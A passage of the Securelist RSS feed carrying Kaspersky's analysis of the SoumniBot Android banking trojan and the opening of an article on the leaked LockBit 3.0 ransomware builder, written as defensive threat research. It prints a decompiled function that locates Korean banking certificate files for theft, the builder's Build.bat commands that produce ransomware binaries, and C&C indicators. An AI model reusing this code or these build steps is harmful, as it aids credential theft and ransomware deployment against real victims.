  1619. <a href="https://opentip.kaspersky.com/telemetry.userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.userfeedsync[.]com</a></p>
  1620. ]]></content:encoded>
  1622. <wfw:commentRss>https://securelist.com/dunequixote/112425/feed/</wfw:commentRss>
  1623. <slash:comments>0</slash:comments>
  1626. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured.jpg" width="1200" height="754"><media:keywords>full</media:keywords></media:content>
  1627. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  1628. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-300x189.jpg" width="300" height="189"><media:keywords>medium</media:keywords></media:content>
  1629. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1630. </item>
  1631. <item>
  1632. <title>SoumniBot: the new Android banker&#8217;s unique techniques</title>
  1633. <link>https://securelist.com/soumnibot-android-banker-obfuscates-app-manifest/112334/</link>
  1634. <comments>https://securelist.com/soumnibot-android-banker-obfuscates-app-manifest/112334/#comments</comments>
  1636. <dc:creator><![CDATA[Dmitry Kalinin]]></dc:creator>
  1637. <pubDate>Wed, 17 Apr 2024 10:00:28 +0000</pubDate>
  1638. <category><![CDATA[Malware descriptions]]></category>
  1639. <category><![CDATA[Google Android]]></category>
  1640. <category><![CDATA[Malware]]></category>
  1641. <category><![CDATA[Malware Descriptions]]></category>
  1642. <category><![CDATA[Malware Technologies]]></category>
  1643. <category><![CDATA[Mobile Malware]]></category>
  1644. <category><![CDATA[Trojan]]></category>
  1645. <category><![CDATA[Trojan Banker]]></category>
  1646. <category><![CDATA[Financial threats]]></category>
  1647. <category><![CDATA[Mobile threats]]></category>
  1648. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112334</guid>
  1649.  
  1650. <description><![CDATA[We review the new mobile Trojan banker SoumniBot, which exploits bugs in the Android manifest parser to dodge analysis and detection.]]></description>
  1651. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/07155410/sl-abstract-mobile-phone-malware-danger-blue-red-binary-code-1-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>The creators of widespread malware programs often employ various tools that hinder code detection and analysis, and Android malware is no exception. As an example of this, droppers, such as Badpack and Hqwar, designed for stealthily delivering Trojan bankers or spyware to smartphones, are very popular among malicious actors who attack mobile devices. That said, we recently discovered a new banker, SoumniBot, which targets Korean users and is notable for an unconventional approach to evading analysis and detection, namely obfuscation of the Android manifest.</p>
  1652. <h2 id="soumnibot-obfuscation-exploiting-bugs-in-the-android-manifest-extraction-and-parsing-procedure">SoumniBot obfuscation: exploiting bugs in the Android manifest extraction and parsing procedure</h2>
  1653. <p>Any APK file is a ZIP archive with AndroidManifest.xml in the root folder. This file contains information about the declared components, permissions and other app data, and helps the operating system to retrieve information about various app entry points. Just like the operating system, the analyst starts by inspecting the manifest to find the entry points, which is where code analysis should start. This is likely what motivated the developers of SoumniBot to research the implementation of the manifest parsing and extracion routine, where they found several interesting opportunities to obfuscate APKs.</p>
  1654. <h3 id="technique-1-invalid-compression-method-value">Technique 1: Invalid Compression method value</h3>
  1655. <p>This is a <a href="https://krebsonsecurity.com/2023/08/how-malicious-android-apps-slip-into-disguise/" target="_blank" rel="noopener">relatively well-known technique</a> used by various types of malware including SoumniBot and associated with the way manifests are unpacked. In <em>libziparchive</em> library, the standard unarchiving function permits only two <em>Compression method</em> values in the record header: 0x0000 (STORED, that is uncompressed) и 0x0008 (DEFLATED, that is compressed with <em>deflate</em> from the <em>zlib</em> library), or else it returns an error.</p>
  1656. <div id="attachment_112415" style="width: 749px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112415" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01.png" alt="libziparchive unarchiving algorithm" width="739" height="498" class="size-full wp-image-112415" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01.png 739w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01-300x202.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01-519x350.png 519w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01-416x280.png 416w" sizes="(max-width: 739px) 100vw, 739px" /></a><p id="caption-attachment-112415" class="wp-caption-text">libziparchive unarchiving algorithm</p></div>
  1657. <p>Yet, instead of using this function, the developers of Android chose to implement an alternate scenario, where the value of the <em>Compression method</em> field is validated incorrectly.</p>
  1658. <div id="attachment_112416" style="width: 761px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112416" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02.png" alt="Manifest extraction procedure" width="751" height="693" class="size-full wp-image-112416" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02.png 751w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02-300x277.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02-379x350.png 379w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02-740x683.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02-303x280.png 303w" sizes="(max-width: 751px) 100vw, 751px" /></a><p id="caption-attachment-112416" class="wp-caption-text">Manifest extraction procedure</p></div>
  1659. <p>If the APK parser comes across any <em>Compression method</em> value but 0x0008 (DEFLATED) in the APK for the AndroidManifest.xml entry, it considers the data uncompressed. This allows app developers to put any value except 8 into <em>Compression method</em> and write uncompressed data. Although any unpacker that correctly implements compression method validation would consider a manifest like that invalid, the Android APK parser recognizes it correctly and allows the application to be installed. The image below illustrates the way the technique is executed in the file <a href="https://opentip.kaspersky.com/b456430b4ed0879271e6164a7c0e4f6e/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b456430b4ed0879271e6164a7c0e4f6e</a>.</p>
  1660. <div id="attachment_112417" style="width: 630px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112417" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03.png" alt="Invalid Compression method value followed by uncompressed data" width="620" height="617" class="size-full wp-image-112417" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03.png 620w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03-300x300.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03-150x150.png 150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03-352x350.png 352w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03-281x280.png 281w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03-50x50.png 50w" sizes="(max-width: 620px) 100vw, 620px" /></a><p id="caption-attachment-112417" class="wp-caption-text">Invalid Compression method value followed by uncompressed data</p></div>
  1661. <h3 id="technique-2-invalid-manifest-size">Technique 2: Invalid manifest size</h3>
  1662. <p>Let&#8217;s use the file <a href="https://opentip.kaspersky.com/0318b7b906e9a34427bf6bbcf64b6fc8/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0318b7b906e9a34427bf6bbcf64b6fc8</a> as an example to review the essence of this technique. The header of AndroidManifest.xml entry inside the ZIP archive states the size of the manifest file. If the entry is stored uncompressed, it will be copied from the archive unchanged, even if its size is stated incorrectly. The manifest parser ignores any overlay, that is information following the payload that&#8217;s unrelated to the manifest. The malware takes advantage of this: the size of the archived manifest stated in it exceeds its actual size, which results in overlay, with some of the archive content being added to the unpacked manifest. Stricter manifest parsers wouldn&#8217;t be able to read a file like that, whereas the Android parser handles the invalid manifest without any errors.</p>
  1663. <div id="attachment_112418" style="width: 617px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112418" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04.png" alt="The stated size of the manifest is much larger than its actual size" width="607" height="482" class="size-full wp-image-112418" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04.png 607w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04-300x238.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04-441x350.png 441w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04-353x280.png 353w" sizes="(max-width: 607px) 100vw, 607px" /></a><p id="caption-attachment-112418" class="wp-caption-text">The stated size of the manifest is much larger than its actual size</p></div>
  1664. <p>Note that although live devices interpret these files as valid, <a href="https://developer.android.com/studio/debug/apk-analyzer" target="_blank" rel="noopener">apkanalyzer</a>, Google&#8217;s own official utility for analyzing assembled APKs, cannot handle them. We have notified Google accordingly.</p>
  1665. <h3 id="technique-3-long-namespace-names">Technique 3: Long namespace names</h3>
  1666. <p>The SoumniBot malware family, for example the file <a href="https://opentip.kaspersky.com/fa8b1592c9cda268d8affb6bceb7a120/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fa8b1592c9cda268d8affb6bceb7a120</a>, has used this technique as well. The manifest contains very long strings, used as the names of XML namespaces.</p>
  1667. <div id="attachment_112419" style="width: 1240px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112419" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05.png" alt="Very long strings in the manifest…" width="1230" height="864" class="size-full wp-image-112419" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05.png 1230w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-300x211.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-1024x719.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-768x539.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-498x350.png 498w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-740x520.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-399x280.png 399w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-800x562.png 800w" sizes="(max-width: 1230px) 100vw, 1230px" /></a><p id="caption-attachment-112419" class="wp-caption-text">Very long strings in the manifest…</p></div>
  1668. <div id="attachment_112420" style="width: 518px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181259/SoumniBot-06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112420" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181259/SoumniBot-06.png" alt="…used as namespace names" width="508" height="69" class="size-full wp-image-112420" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181259/SoumniBot-06.png 508w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181259/SoumniBot-06-300x41.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181259/SoumniBot-06-500x69.png 500w" sizes="(max-width: 508px) 100vw, 508px" /></a><p id="caption-attachment-112420" class="wp-caption-text">…used as namespace names</p></div>
  1669. <p>Manifests that contain strings like these become unreadable for both humans and programs, with the latter may not be able to allocate enough memory to process them. The manifest parser in the OS itself completely ignores namespaces, so the manifest is handled without errors.</p>
  1670. <h2 id="whats-under-the-obfuscation-soumnibots-functionality">What&#8217;s under the obfuscation: SoumniBot&#8217;s functionality</h2>
  1671. <p>When started, the application requests a configuration with two parameters, mainsite и mqtt, from the server, whose address being a hardcoded constant.</p>
  1672. <div id="attachment_112421" style="width: 459px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181415/SoumniBot-07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112421" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181415/SoumniBot-07.png" alt="Parameter request" width="449" height="266" class="size-full wp-image-112421" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181415/SoumniBot-07.png 449w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181415/SoumniBot-07-300x178.png 300w" sizes="(max-width: 449px) 100vw, 449px" /></a><p id="caption-attachment-112421" class="wp-caption-text">Parameter request</p></div>
  1673. <p>Both parameters are server addresses, which the malware needs for proper functioning. The mainsite server receives collected data, and mqtt provides MQTT messaging functionality for receiving commands. If the source server did not provide these parameters for some reason, the application will use the default addresses, also stored in the code.</p>
  1674. <p>After requesting the parameters, the application starts a malicious service. If it cannot start or stops for some reason, a new attempt is made every 16 minutes. When run for the first time, the Trojan hides the app icon to complicate removal, and then starts to upload data in the background from the victim&#8217;s device to mainsite every 15 seconds. The data includes the IP address, country deduced from that, contact and account lists, SMS and MMS messages, and the victim&#8217;s ID generated with the help of the <a href="https://github.com/trustdecision/trustdevice-android" target="_blank" rel="noopener">trustdevice-android</a> library. The Trojan also subscribes to messages from the MQTT server to receive the commands described below.</p>
  1675. <table width="100%">
  1676. <tbody>
  1677. <tr>
  1678. <td style="text-align: center" width="10%"><strong>#</strong></td>
  1679. <td style="text-align: center" width="50%"><strong>Description</strong></td>
  1680. <td style="text-align: center" width="40%"><strong>Parameters</strong></td>
  1681. </tr>
  1682. <tr>
  1683. <td style="text-align: center">0</td>
  1684. <td>Sends information about the infected device: phone number, carrier, etc., and the Trojan version, followed by all of the victim&#8217;s SMS messages, contacts, accounts, photos, videos and online banking digital certificates.</td>
  1685. <td>&#8211;</td>
  1686. </tr>
  1687. <tr>
  1688. <td style="text-align: center">1</td>
  1689. <td>Sends the victim&#8217;s contact list.</td>
  1690. <td>&#8211;</td>
  1691. </tr>
  1692. <tr>
  1693. <td style="text-align: center">2</td>
  1694. <td>Deletes a contact on the victim&#8217;s device.</td>
  1695. <td><em>data</em>: the name of the contact to delete</td>
  1696. </tr>
  1697. <tr>
  1698. <td style="text-align: center">3</td>
  1699. <td>Sends the victim&#8217;s SMS and MMS messages.</td>
  1700. <td>&#8211;</td>
  1701. </tr>
  1702. <tr>
  1703. <td style="text-align: center">4</td>
  1704. <td>A debugging command likely to be replaced with sending call logs in a new version.</td>
  1705. <td>&#8211;</td>
  1706. </tr>
  1707. <tr>
  1708. <td style="text-align: center">5</td>
  1709. <td>Sends the victim&#8217;s photos and videos.</td>
  1710. <td>&#8211;</td>
  1711. </tr>
  1712. <tr>
  1713. <td style="text-align: center">8</td>
  1714. <td>Sends an SMS message.</td>
  1715. <td><em>data</em>: ID that the malware uses to receive a message to forward. The Trojan sends the ID to mainsite and gets message text in return.</td>
  1716. </tr>
  1717. <tr>
  1718. <td style="text-align: center">24</td>
  1719. <td>Sends a list of installed apps.</td>
  1720. <td>&#8211;</td>
  1721. </tr>
  1722. <tr>
  1723. <td style="text-align: center">30</td>
  1724. <td>Adds a new contact on the device.</td>
  1725. <td><em>name</em>: contact name; <em>phoneNum</em>: phone number</td>
  1726. </tr>
  1727. <tr>
  1728. <td style="text-align: center">41</td>
  1729. <td>Gets ringtone volume levels.</td>
  1730. <td>&#8211;</td>
  1731. </tr>
  1732. <tr>
  1733. <td style="text-align: center">42</td>
  1734. <td>Turns silent mode on or off.</td>
  1735. <td><em>data</em>: a flag set to 1 to turn on silent mode and to 0 to turn it off</td>
  1736. </tr>
  1737. <tr>
  1738. <td style="text-align: center">99</td>
  1739. <td>Sends a <em>pong</em> message in response to an MQTT ping request.</td>
  1740. <td>&#8211;</td>
  1741. </tr>
  1742. <tr>
  1743. <td style="text-align: center">100</td>
  1744. <td>Turns on debug mode.</td>
  1745. <td>&#8211;</td>
  1746. </tr>
  1747. <tr>
  1748. <td style="text-align: center">101</td>
  1749. <td>Turns off debug mode.</td>
  1750. <td>&#8211;</td>
  1751. </tr>
  1752. </tbody>
  1753. </table>
  1754. <p>The command with the number 0 is worth special mention. It searches, among other things, external storage media for .key and .der files that contain paths to /NPKI/yessign.</p><pre class="crayon-plain-tag">public static List getAllBankingKeys(Context context) {
  1755. List list = new ArrayList();
  1756. Cursor cursor = context.getContentResolver().query(MediaStore.Files.getContentUri("external"),
  1757. new String[]{"_id", "mime_type", "_size", "date_modified", "_data"},
  1758. "(_data LIKE \'%.key\' OR _data LIKE \'%.der\')", null, null);
  1759. int index = cursor == null ? 0 : cursor.getColumnIndexOrThrow("_data");
  1760. if (cursor != null) {
  1761. while (cursor.moveToNext()) {
  1762. String s = cursor.getString(index);
  1763. If (!s.contains("/NPKI/yessign")) {
  1764. continue;
  1765. }
  1766. Logger.log("path is:" + s);
  1767. list.add(s);
  1768. break;
  1769. }
  1770. cursor.close();
  1771. }
  1772. return list;
  1773. }</pre><p>
  1774. If the application finds files like that, it copies the directory where they are located into a ZIP archive and sends it to the C&#038;C server. These files are digital certificates issued by Korean banks to their clients and used for signing in to online banking services or confirming banking transactions.  This technique is quite uncommon for Android banking malware. Kaspersky security solutions detect SoumniBot despite its sophisticated obfuscation techniques, and assign to it the verdict of Trojan-Banker.AndroidOS.SoumniBot.</p>
  1775. <h2 id="conclusion">Conclusion</h2>
  1776. <p>Malware creators seek to maximize the number of devices they infect without being noticed. This motivates them to look for new ways of complicating detection. The developers of SoumniBot unfortunately succeeded due to insufficiently strict validations in the Android manifest parser code.</p>
  1777. <p>We have detailed the techniques used by this Trojan, so that researchers around the world are aware of the tactics, which other types of malware might borrow in the future. Besides the unconventional obfuscation, SoumniBot is notable for stealing Korean online banking keys, which we rarely observe in Android bankers. This feature lets malicious actors empty unwitting victims&#8217; wallets and circumvent authentication methods used by banks. To avoid becoming a victim of malware like that, we recommend using a reliable security solution on your smartphone to detect the Trojan and prevent it from being installed despite all its tricks.</p>
  1778. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1779. <p><strong>MD5</strong><br />
  1780. <a href="https://opentip.kaspersky.com/0318b7b906e9a34427bf6bbcf64b6fc8/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0318b7b906e9a34427bf6bbcf64b6fc8</a><br />
  1781. <a href="https://opentip.kaspersky.com/00aa9900205771b8c9e7927153b77cf2/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">00aa9900205771b8c9e7927153b77cf2</a><br />
  1782. <a href="https://opentip.kaspersky.com/b456430b4ed0879271e6164a7c0e4f6e/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b456430b4ed0879271e6164a7c0e4f6e</a><br />
  1783. <a href="https://opentip.kaspersky.com/fa8b1592c9cda268d8affb6bceb7a120/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fa8b1592c9cda268d8affb6bceb7a120</a></p>
  1784. <p><strong>C&amp;C</strong><br />
  1785. <a href="https://opentip.kaspersky.com/https:/google.kt9.site/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https[://]google.kt9[.]site</a><br />
  1786. <a href="https://opentip.kaspersky.com/https:/dbdb.addea.workers.dev/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https[://]dbdb.addea.workers[.]dev</a></p>
  1787. ]]></content:encoded>
  1789. <wfw:commentRss>https://securelist.com/soumnibot-android-banker-obfuscates-app-manifest/112334/feed/</wfw:commentRss>
  1790. <slash:comments>1</slash:comments>
  1793. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/07155410/sl-abstract-mobile-phone-malware-danger-blue-red-binary-code-1.jpg" width="1885" height="1060"><media:keywords>full</media:keywords></media:content>
  1794. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/07155410/sl-abstract-mobile-phone-malware-danger-blue-red-binary-code-1-1024x576.jpg" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
  1795. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/07155410/sl-abstract-mobile-phone-malware-danger-blue-red-binary-code-1-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  1796. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/07155410/sl-abstract-mobile-phone-malware-danger-blue-red-binary-code-1-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1797. </item>
  1798. <item>
  1799. <title>Using the LockBit builder to generate targeted ransomware</title>
  1800. <link>https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/</link>
  1801. <comments>https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/#respond</comments>
  1803. <dc:creator><![CDATA[Eduardo Ovalle, Francesco Figurelli, Cristian Souza, Ashley Muñoz]]></dc:creator>
  1804. <pubDate>Mon, 15 Apr 2024 10:00:28 +0000</pubDate>
  1805. <category><![CDATA[Malware descriptions]]></category>
  1806. <category><![CDATA[Data Encryption]]></category>
  1807. <category><![CDATA[Incident response]]></category>
  1808. <category><![CDATA[LockBit]]></category>
  1809. <category><![CDATA[Malware]]></category>
  1810. <category><![CDATA[Malware Technologies]]></category>
  1811. <category><![CDATA[Ransomware]]></category>
  1812. <category><![CDATA[Targeted attacks]]></category>
  1813. <category><![CDATA[Trojan]]></category>
  1814. <category><![CDATA[APT (Targeted attacks)]]></category>
  1815. <category><![CDATA[Windows malware]]></category>
  1816. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112375</guid>
  1817.  
  1818. <description><![CDATA[Kaspersky researchers revisit the leaked LockBit 3.0 builder and share insights into a real-life incident involving a custom targeted ransomware variant created with this builder.]]></description>
  1819. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/14130512/sl-lock-ecnryption-ransomware-blue-1200x646-1-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>The previous Kaspersky <a href="https://securelist.com/lockbit-ransomware-builder-analysis/110370/" target="_blank" rel="noopener">research</a> focused on a detailed analysis of the LockBit 3.0 builder leaked in 2022. Since then, attackers have been able to generate customized versions of the threat according to their needs. This opens up numerous possibilities for malicious actors to make their attacks more effective, since it is possible to configure network spread options and defense-killing functionality. It becomes even more dangerous if the attacker has valid privileged credentials in the target infrastructure.</p>
  1820. <p>In a recent incident response engagement, we faced this exact scenario: the adversary was able to get the administrator credential in plain text. They generated a custom version of the ransomware, which used the aforementioned account credential to spread across the network and perform malicious activities, such as killing Windows Defender and erasing Windows Event Logs in order to encrypt the data and cover its tracks.</p>
  1821. <p>In this article, we revisit the LockBit 3.0 builder files and delve into the adversary&#8217;s steps to maximize impact on the network. In addition, we provide a list of preventive activities that can help network administrators to avoid this kind of threat.</p>
  1822. <h2 id="revisiting-the-lockbit-3-0-builder-files">Revisiting the LockBit 3.0 builder files</h2>
  1823. <p>The LockBit 3.0 builder has significantly simplified creating customized ransomware. The image below shows the files that constitute it. As we can see, <strong>keygen.exe</strong> generates public and private keys used for encryption and decryption. After that, <strong>builder.exe</strong> generates the variant according to the options set in the <strong>config.json</strong> file.</p>
  1824. <div id="attachment_112388" style="width: 930px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112388" class="size-full wp-image-112388" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01.png" alt="LockBit builder files" width="920" height="393" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01.png 920w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-300x128.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-768x328.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-819x350.png 819w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-740x316.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-655x280.png 655w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103136/LockBit_case_01-800x342.png 800w" sizes="(max-width: 920px) 100vw, 920px" /></a><p id="caption-attachment-112388" class="wp-caption-text">LockBit builder files</p></div>
  1825. <p>This whole process is automated with the <strong>Build.bat</strong> script, which does the following:</p><pre class="crayon-plain-tag">IF exist Build (ERASE /F /Q Build\*.*) ELSE (mkdir Build)
  1826. keygen -path Build -pubkey pub.key -privkey priv.key
  1827. builder -type dec -privkey Build\priv.key -config config.json -ofile Build\LB3Decryptor.exe
  1828. builder -type enc -exe -pubkey Build\pub.key -config config.json -ofile Build\LB3.exe
  1829. builder -type enc -exe -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_pass.exe
  1830. builder -type enc -dll -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32.dll
  1831. builder -type enc -dll -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32_pass.dll
  1832. builder -type enc -ref -pubkey Build\pub.key -config config.json -ofile Build\LB3_ReflectiveDll_DllMain.dll</pre><p>
  1833. The <strong>config.json</strong> file allows enabling impersonation features (<strong>impersonation</strong>) and defining accounts to impersonate (<strong>impers_accounts</strong>). In the example below, the administrator account was used for impersonation. The configuration also allows enabling the encryption of network shares (<strong>network_shares</strong>), killing Windows Defender (<strong>kill_defender</strong>), and spreading across the network via PsExec (<strong>psexec_netspread</strong>). After a successful infection, the malicious sample can delete Windows Event Logs (<strong>delete_eventlogs</strong>) to cover its tracks.</p>
  1834. <div id="attachment_112389" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112389" class="size-large wp-image-112389" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-1024x508.png" alt="Custom configuration" width="1024" height="508" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-1024x508.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-768x381.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-706x350.png 706w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-740x367.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-565x280.png 565w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02-800x397.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103436/LockBit_case_02.png 1382w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112389" class="wp-caption-text">Custom configuration</p></div>
